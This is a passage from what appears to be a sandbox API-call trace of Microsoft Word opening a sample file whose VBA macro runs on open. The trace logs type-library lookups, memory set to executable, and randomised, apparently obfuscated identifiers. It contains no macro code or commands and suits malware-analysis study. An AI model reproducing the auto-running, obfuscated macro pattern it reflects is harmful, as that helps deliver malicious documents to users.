CRetailMalloc_Free () returned 0x430001 [0022.971] CRetailMalloc_Alloc () returned 0x55d88c8 [0022.971] CRetailMalloc_Free () returned 0x2780001 [0022.971] CRetailMalloc_Alloc () returned 0x56ca820 [0022.971] CRetailMalloc_Free () returned 0x1fd0001 [0022.971] CRetailMalloc_Alloc () returned 0x56ca820 [0022.972] CRetailMalloc_Free () returned 0x1fd0001 [0022.972] IUnknown:Release (This=0x2876bc0) returned 0x2 [0022.973] CRetailMalloc_Alloc () returned 0x5725eb8 [0022.973] CRetailMalloc_Alloc () returned 0x58120b0 [0022.973] CRetailMalloc_Alloc () returned 0x55d87d8 [0022.973] CRetailMalloc_Alloc () returned 0x776cea8 [0023.044] CRetailMalloc_Alloc () returned 0x78b1d70 [0023.046] ITypeLib:RemoteGetDocumentation (in: This=0x2876548, index=-1, refPtrFlags=0x1263ec, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0023.046] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0023.046] IUnknown:Release (This=0x2876548) returned 0x3 [0023.046] ITypeLib:RemoteGetDocumentation (in: This=0x2875630, index=-1, refPtrFlags=0x1263ec, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0023.046] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0023.046] IUnknown:Release (This=0x2875630) returned 0x7 [0023.046] ITypeLib:RemoteGetDocumentation (in: This=0x2876770, index=-1, refPtrFlags=0x1263ec, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0023.046] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0023.046] IUnknown:Release (This=0x2876770) returned 0x4 [0023.046] wcscpy_s (in: _Destination=0x55d88cc, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0023.047] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0023.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x12656c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0023.051] CRetailMalloc_Free () returned 0x5b20001 [0023.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sample_file", cchWideChar=-1, lpMultiByteStr=0x3fd5d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sample_file", lpUsedDefaultChar=0x0) returned 12 [0023.053] CRetailMalloc_Alloc () returned 0x5725f88 [0023.053] CRetailMalloc_Alloc () returned 0x55d8788 [0023.053] CRetailMalloc_Alloc () returned 0x776cee8 [0023.054] CRetailMalloc_Alloc () returned 0x5726058 [0023.054] CRetailMalloc_Alloc () returned 0x55d8738 [0023.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project.Module1.autoopen", cchWideChar=-1, lpMultiByteStr=0x126630, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project.Module1.autoopen", lpUsedDefaultChar=0x0) returned 25 [0023.112] CRetailMalloc_Alloc () returned 0x55d8710 [0023.115] CRetailMalloc_Alloc () returned 0x56a94c8 [0023.115] CRetailMalloc_Alloc () returned 0x57960d0 [0023.115] CRetailMalloc_Alloc () returned 0x5796140 [0023.115] CRetailMalloc_Alloc () returned 0x2877460 [0023.115] CRetailMalloc_Alloc () returned 0x56cb980 [0023.115] CRetailMalloc_Alloc () returned 0x56cbba8 [0023.115] CRetailMalloc_Alloc () returned 0x5816058 [0023.115] CRetailMalloc_Free () returned 0x1 [0023.116] CRetailMalloc_Alloc () returned 0x579ce20 [0023.116] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0023.116] ITypeLib:RemoteGetLibAttr (in: This=0x2876548, ppTLibAttr=0x125c38, pDummy=0x125e20 | out: ppTLibAttr=0x125c38, pDummy=0x125e20*=0x0) returned 0x0 [0023.116] ITypeLib:RemoteGetDocumentation (in: This=0x2876548, index=-1, refPtrFlags=0x125c34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20*=0x0) returned 0x0 [0023.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=49, lpMultiByteStr=0x125c84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL\\\x12", lpUsedDefaultChar=0x0) returned 49 [0023.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x125d8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0023.116] IUnknown:AddRef (This=0x2876548) returned 0x5 [0023.116] ITypeLib:LocalReleaseTLibAttr (This=0x2876548) returned 0x55d88c8 [0023.116] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0023.117] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned 0 [0023.117] ITypeLib:RemoteGetLibAttr (in: This=0x2875630, ppTLibAttr=0x125c38, pDummy=0x125e20 | out: ppTLibAttr=0x125c38, pDummy=0x125e20*=0x0) returned 0x0 [0023.117] ITypeLib:RemoteGetDocumentation (in: This=0x2875630, index=-1, refPtrFlags=0x125c34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20*=0x0) returned 0x0 [0023.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", cchWideChar=53, lpMultiByteStr=0x125c84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 53 [0023.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x125d8c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0023.117] IUnknown:AddRef (This=0x2875630) returned 0x9 [0023.117] ITypeLib:LocalReleaseTLibAttr (This=0x2875630) returned 0x55d88c8 [0023.117] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0023.117] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned -5 [0023.117] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0023.117] ITypeLib:RemoteGetLibAttr (in: This=0x2876770, ppTLibAttr=0x125c38, pDummy=0x125e20 | out: ppTLibAttr=0x125c38, pDummy=0x125e20*=0x0) returned 0x0 [0023.117] ITypeLib:RemoteGetDocumentation (in: This=0x2876770, index=-1, refPtrFlags=0x125c34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20*=0x0) returned 0x0 [0023.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x125c84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Office15\\MSWORç//wõ\x95%wÐ", lpUsedDefaultChar=0x0) returned 31 [0023.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x125d8c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0023.118] CRetailMalloc_Alloc () returned 0x56cc220 [0023.118] IUnknown:AddRef (This=0x2876770) returned 0x6 [0023.118] ITypeLib:LocalReleaseTLibAttr (This=0x2876770) returned 0x55d88c8 [0023.118] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0023.118] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library") returned 2 [0023.118] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0023.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\CNormal") returned 4 [0023.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0 [0023.119] ITypeLib:RemoteGetLibAttr (in: This=0x2876bc0, ppTLibAttr=0x125c38, pDummy=0x125e20 | out: ppTLibAttr=0x125c38, pDummy=0x125e20*=0x0) returned 0x0 [0023.119] ITypeLib:RemoteGetDocumentation (in: This=0x2876bc0, index=-1, refPtrFlags=0x125c34, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x125e20*=0x0) returned 0x0 [0023.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchWideChar=63, lpMultiByteStr=0x125c84, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL", lpUsedDefaultChar=0x0) returned 63 [0023.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x125d8c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0023.119] IUnknown:AddRef (This=0x2876bc0) returned 0x4 [0023.119] ITypeLib:LocalReleaseTLibAttr (This=0x2876bc0) returned 0x55d8940 [0023.119] CRetailMalloc_Free () returned 0x35a0001 [0023.119] CRetailMalloc_Alloc () returned 0x786b6b0 [0023.119] CRetailMalloc_Alloc () returned 0x786b6c8 [0023.119] CRetailMalloc_Alloc () returned 0x786b6e0 [0023.119] CRetailMalloc_Alloc () returned 0x786b6f8 [0023.119] CRetailMalloc_Alloc () returned 0x579ce58 [0023.120] CRetailMalloc_Alloc () returned 0x579ce90 [0023.120] CRetailMalloc_Alloc () returned 0x786b710 [0023.120] CRetailMalloc_Free () returned 0xed80001 [0023.120] CRetailMalloc_Alloc () returned 0x573e8e0 [0023.120] CRetailMalloc_Alloc () returned 0x786b710 [0023.120] CRetailMalloc_Alloc () returned 0x786b728 [0023.120] CRetailMalloc_Alloc () returned 0x776cf28 [0023.120] CRetailMalloc_Free () returned 0x4620001 [0023.120] CRetailMalloc_Alloc () returned 0x786b740 [0023.120] CRetailMalloc_Free () returned 0xede0001 [0023.120] CRetailMalloc_Alloc () returned 0x786b740 [0023.120] CRetailMalloc_Free () returned 0xede0001 [0023.121] CRetailMalloc_Alloc () returned 0x776cf68 [0023.121] CRetailMalloc_Alloc () returned 0x786b740 [0023.121] CRetailMalloc_Free () returned 0xede0001 [0023.121] CRetailMalloc_Alloc () returned 0x776cfa8 [0023.121] VirtualProtect (in: lpAddress=0x28774b2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x126174 | out: lpflOldProtect=0x126174*=0x4) returned 1 [0023.121] VirtualProtect (in: lpAddress=0x28774c6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x126174 | out: lpflOldProtect=0x126174*=0x40) returned 1 [0023.121] CRetailMalloc_Alloc () returned 0x786b740 [0023.121] CRetailMalloc_Free () returned 0x13a0001 [0023.121] CRetailMalloc_Alloc () returned 0x55d8710 [0023.125] CRetailMalloc_Alloc () returned 0x78b1d70 [0023.135] IUnknown:Release (This=0x569ef84) returned 0x1 [0023.135] IUnknown:AddRef (This=0x569efdc) returned 0x3 [0023.135] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x1259e4, pDummy=0x0 | out: ppTypeAttr=0x1259e4, pDummy=0x0) returned 0x0 [0023.135] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x5725de8 [0023.135] ITypeInfo:GetRefTypeOfImplType (in: This=0x569efdc, index=0x0, pRefType=0x1259d8 | out: pRefType=0x1259d8*=0x3) returned 0x0 [0023.135] ITypeInfo:GetRefTypeInfo (in: This=0x569efdc, hreftype=0x3, ppTInfo=0x1259dc | out: ppTInfo=0x1259dc*=0x572f1cc) returned 0x0 [0023.135] IUnknown:Release (This=0x569efdc) returned 0x2 [0023.135] ITypeInfo:RemoteGetTypeAttr (in: This=0x572f1cc, ppTypeAttr=0x1259e4, pDummy=0x0 | out: ppTypeAttr=0x1259e4, pDummy=0x0) returned 0x0 [0023.135] ITypeInfo:LocalReleaseTypeAttr (This=0x572f1cc) returned 0x5725de8 [0023.135] ITypeInfo:GetRefTypeOfImplType (in: This=0x572f1cc, index=0x0, pRefType=0x1259d8 | out: pRefType=0x1259d8*=0x12e) returned 0x0 [0023.135] ITypeInfo:GetRefTypeInfo (in: This=0x572f1cc, hreftype=0x12e, ppTInfo=0x1259dc | out: ppTInfo=0x1259dc*=0x572f1f8) returned 0x0 [0023.135] IUnknown:Release (This=0x572f1cc) returned 0x1 [0023.136] ITypeInfo:RemoteGetTypeAttr (in: This=0x572f1f8, ppTypeAttr=0x1259e4, pDummy=0x0 | out: ppTypeAttr=0x1259e4, pDummy=0x0) returned 0x0 [0023.136] ITypeInfo:LocalReleaseTypeAttr (This=0x572f1f8) returned 0x5725de8 [0023.136] IUnknown:Release (This=0x572f1f8) returned 0x1 [0023.136] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.136] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x1259f4, pDummy=0x5811d98 | out: ppTypeAttr=0x1259f4, pDummy=0x5811d98*=0x720f1164) returned 0x0 [0023.136] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x5725de8 [0023.136] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.136] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.136] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.145] IUnknown:AddRef (This=0x569f008) returned 0x4 [0023.145] IUnknown:Release (This=0x569f008) returned 0x3 [0023.145] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.145] ITypeInfo:RemoteGetTypeAttr (in: This=0x569ef84, ppTypeAttr=0x1259a8, pDummy=0x57998a8 | out: ppTypeAttr=0x1259a8, pDummy=0x57998a8*=0x0) returned 0x0 [0023.145] ITypeInfo:LocalReleaseTypeAttr (This=0x569ef84) returned 0x5725de8 [0023.145] IUnknown:Release (This=0x569ef84) returned 0x1 [0023.145] CoCreateGuid (in: pguid=0x1259f4 | out: pguid=0x1259f4*(Data1=0xce20817, Data2=0x603a, Data3=0x4df5, Data4=([0]=0xa3, [1]=0x99, [2]=0x67, [3]=0x27, [4]=0x6c, [5]=0x49, [6]=0x7f, [7]=0xb8))) returned 0x0 [0023.145] CoCreateGuid (in: pguid=0x1259f4 | out: pguid=0x1259f4*(Data1=0x3d60a930, Data2=0x135b, Data3=0x4f7b, Data4=([0]=0xb4, [1]=0x43, [2]=0x42, [3]=0x24, [4]=0xec, [5]=0x83, [6]=0xa6, [7]=0xe0))) returned 0x0 [0023.145] CRetailMalloc_Alloc () returned 0x78b3630 [0023.146] CRetailMalloc_Alloc () returned 0x5724cb8 [0023.147] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x125a98, pDummy=0x0 | out: ppTypeAttr=0x125a98, pDummy=0x0) returned 0x0 [0023.147] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x5725de8 [0023.147] ITypeInfo:GetRefTypeOfImplType (in: This=0x569efdc, index=0x0, pRefType=0x125a8c | out: pRefType=0x125a8c*=0x3) returned 0x0 [0023.147] ITypeInfo:GetRefTypeInfo (in: This=0x569efdc, hreftype=0x3, ppTInfo=0x125a90 | out: ppTInfo=0x125a90*=0x572f1cc) returned 0x0 [0023.147] IUnknown:Release (This=0x569efdc) returned 0x1 [0023.147] ITypeInfo:RemoteGetTypeAttr (in: This=0x572f1cc, ppTypeAttr=0x125a98, pDummy=0x0 | out: ppTypeAttr=0x125a98, pDummy=0x0) returned 0x0 [0023.147] ITypeInfo:LocalReleaseTypeAttr (This=0x572f1cc) returned 0x5725de8 [0023.147] ITypeInfo:GetRefTypeOfImplType (in: This=0x572f1cc, index=0x0, pRefType=0x125a8c | out: pRefType=0x125a8c*=0x12e) returned 0x0 [0023.147] ITypeInfo:GetRefTypeInfo (in: This=0x572f1cc, hreftype=0x12e, ppTInfo=0x125a90 | out: ppTInfo=0x125a90*=0x572f1f8) returned 0x0 [0023.147] IUnknown:Release (This=0x572f1cc) returned 0x1 [0023.147] ITypeInfo:RemoteGetTypeAttr (in: This=0x572f1f8, ppTypeAttr=0x125a98, pDummy=0x0 | out: ppTypeAttr=0x125a98, pDummy=0x0) returned 0x0 [0023.147] ITypeInfo:LocalReleaseTypeAttr (This=0x572f1f8) returned 0x5725de8 [0023.147] IUnknown:Release (This=0x572f1f8) returned 0x1 [0023.147] CRetailMalloc_Alloc () returned 0x578d4d8 [0023.150] CRetailMalloc_Alloc () returned 0x55c2bf8 [0023.150] CRetailMalloc_Free () returned 0x1220001 [0023.150] VirtualProtect (in: lpAddress=0x28774b2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1252d4 | out: lpflOldProtect=0x1252d4*=0x40) returned 1 [0023.150] VirtualProtect (in: lpAddress=0x28774c6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1252d4 | out: lpflOldProtect=0x1252d4*=0x40) returned 1 [0023.151] CRetailMalloc_Alloc () returned 0x578d530 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797e7c, cbMultiByte=9, lpWideCharStr=0x453007c, cchWideChar=20 | out: lpWideCharStr="WsKaCMuKU") returned 9 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797e8a, cbMultiByte=10, lpWideCharStr=0x45300cc, cchWideChar=22 | out: lpWideCharStr="pSbWwraCzK") returned 10 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797e9a, cbMultiByte=7, lpWideCharStr=0x4530156, cchWideChar=16 | out: lpWideCharStr="vNZECzw") returned 7 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797ea8, cbMultiByte=11, lpWideCharStr=0x45302ee, cchWideChar=24 | out: lpWideCharStr="GRtZHMUNKxb") returned 11 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797eba, cbMultiByte=8, lpWideCharStr=0x453040e, cchWideChar=18 | out: lpWideCharStr="rDNkdeDH") returned 8 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797ec8, cbMultiByte=11, lpWideCharStr=0x4530528, cchWideChar=24 | out: lpWideCharStr="DYnDmzfuZaV") returned 11 [0023.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5797eda, cbMultiByte=11, lpWideCharStr=0x4530648, cchWideChar=24 | out: lpWideCharStr="RxdZuREUTKd") returned 11 [0023.151] CRetailMalloc_Alloc () returned 0x776cf68 [0023.151] CRetailMalloc_Alloc () returned 0x5810708 [0023.151] CRetailMalloc_Alloc () returned 0x578dd40 [0023.151] CRetailMalloc_Alloc () returned 0x55d86e8 [0023.151] CRetailMalloc_Alloc () returned 0x786b800 [0023.151] CRetailMalloc_Alloc () returned 0x5728400 [0023.151] CRetailMalloc_Alloc () returned 0x78b1ce0 [0023.151] CRetailMalloc_Alloc () returned 0x78b1d50 [0023.151] IUnknown:QueryInterface (in: This=0x2876548, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253c4 | out: ppvObject=0x1253c4*=0x0) returned 0x80004002 [0023.152] ITypeLib:GetTypeComp (in: This=0x2876548, ppTComp=0x1253c8 | out: ppTComp=0x1253c8*=0x2876550) returned 0x0 [0023.152] CRetailMalloc_Alloc () returned 0x5818650 [0023.152] IUnknown:AddRef (This=0x2876550) returned 0x7 [0023.152] IUnknown:Release (This=0x2876550) returned 0x6 [0023.152] IUnknown:Release (This=0x2876548) returned 0x5 [0023.152] IUnknown:QueryInterface (in: This=0x2875630, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253c4 | out: ppvObject=0x1253c4*=0x0) returned 0x80004002 [0023.152] ITypeLib:GetTypeComp (in: This=0x2875630, ppTComp=0x1253c8 | out: ppTComp=0x1253c8*=0x2875638) returned 0x0 [0023.152] CRetailMalloc_Alloc () returned 0x58185f0 [0023.152] IUnknown:AddRef (This=0x2875638) returned 0xb [0023.152] IUnknown:Release (This=0x2875638) returned 0xa [0023.152] IUnknown:Release (This=0x2875630) returned 0x9 [0023.152] IUnknown:QueryInterface (in: This=0x2876770, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253c4 | out: ppvObject=0x1253c4*=0x0) returned 0x80004002 [0023.152] ITypeLib:GetTypeComp (in: This=0x2876770, ppTComp=0x1253c8 | out: ppTComp=0x1253c8*=0x2876778) returned 0x0 [0023.152] CRetailMalloc_Alloc () returned 0x581ad50 [0023.152] IUnknown:AddRef (This=0x2876778) returned 0x8 [0023.152] IUnknown:Release (This=0x2876778) returned 0x7 [0023.152] IUnknown:Release (This=0x2876770) returned 0x6 [0023.152] wcscpy_s (in: _Destination=0x55d8dcc, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0023.153] CRetailMalloc_Alloc () returned 0x581ae10 [0023.153] IUnknown:QueryInterface (in: This=0x2876bc0, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253c4 | out: ppvObject=0x1253c4*=0x0) returned 0x80004002 [0023.153] ITypeLib:GetTypeComp (in: This=0x2876bc0, ppTComp=0x1253c8 | out: ppTComp=0x1253c8*=0x2876bc8) returned 0x0 [0023.153] CRetailMalloc_Alloc () returned 0x581acf0 [0023.153] IUnknown:AddRef (This=0x2876bc8) returned 0x6 [0023.153] IUnknown:Release (This=0x2876bc8) returned 0x5 [0023.153] IUnknown:Release (This=0x2876bc0) returned 0x4 [0023.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f270e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="KPHsVttxfBg") returned 12 [0023.153] CRetailMalloc_Alloc () returned 0x578dfb0 [0023.154] CRetailMalloc_Alloc () returned 0x55d86c0 [0023.154] CRetailMalloc_Alloc () returned 0x78b1de0 [0023.154] CRetailMalloc_Alloc () returned 0x78b1df0 [0023.154] CRetailMalloc_Alloc () returned 0x55d8698 [0023.154] CRetailMalloc_Alloc () returned 0x5728268 [0023.154] ITypeComp:RemoteBind (in: This=0x2876550, szName="KPHsVttxfBg", lHashVal=0x10c9b6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x22c) returned 0x0 [0023.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f270e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="KPHsVttxfBg") returned 12 [0023.154] ITypeComp:RemoteBind (in: This=0x2875638, szName="KPHsVttxfBg", lHashVal=0x10c9b6, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x22c) returned 0x0 [0023.154] MultiByteToWideChar (in: 